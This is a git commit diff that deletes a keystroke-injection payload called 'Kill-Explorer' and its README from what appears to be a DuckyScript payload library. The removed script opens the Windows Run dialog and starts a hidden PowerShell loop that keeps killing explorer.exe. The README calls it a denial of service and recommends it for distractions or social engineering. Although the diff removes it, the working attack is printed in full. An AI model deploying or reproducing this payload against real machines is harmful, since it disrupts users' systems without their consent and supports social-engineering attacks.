Delete payloads/library/execution/Kill-Explorer directory

pull/468/head
Nate 2024-08-04 20:13:49 -05:00 committed by GitHub
parent 5928326db7
commit 8eba7c5e9b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 0 additions and 23 deletions

View File

@ -1,12 +0,0 @@
REM_BLOCK
Title: Kill-Explorer
Version 1.0
Target: Windows 10, 11
Author: Nate
Brief Description: Kill the explorer process repeatedly causing loss of Windows Desktop functionality.
END_REM
DELAY 2500
GUI r
DELAY 500
STRINGLN powershell /w 1 while($true){kill -name explorer}

View File

@ -1,11 +0,0 @@
# Kill-Explorer
A ducky script that kills explorer.exe repeatedly resulting in loss of Windows Desktop functionality. The command executed is a simple Denial of Service for the intended user.
## Configuration
1. Execute on windows 10 or Windows 11.
2. Logoff or restart to reset your windows session.
## Notes
A great tool for distractions or social engineering.
## Windows Command (used in payload)
```Powershell
powershell /w 1 while($true){kill -name explorer}
```